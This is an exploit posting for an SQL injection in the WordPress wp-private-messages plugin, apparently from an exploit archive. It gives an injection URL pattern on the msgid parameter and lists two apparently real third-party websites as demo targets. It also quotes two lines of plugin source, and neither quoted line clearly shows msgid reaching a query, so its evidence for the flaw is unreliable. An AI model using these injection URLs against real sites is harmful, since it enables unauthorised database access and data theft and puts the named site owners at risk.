The Wordpress wp-private-messages Plugin suffers from a Sql Injection vulnerability. ################################# # Iranian Exploit DataBase # Www.exploit.IrIsT.Ir ################################# # Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Home : http://exploit.IrIsT.Ir # Software Link : http://wordpress.org/plugins/wp-private-messages/ # Security Risk : High # Tested on : Linux ################################# # Exploit : # http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] # Dem0 : # http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] # http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql] ################################# # Vuln Source C0de : # Lin 145 : # $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC"); # And Lin 160 : # echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>"; ################################# # Exploit Archive : http://exploit.irist.ir/exploits-148.html #################################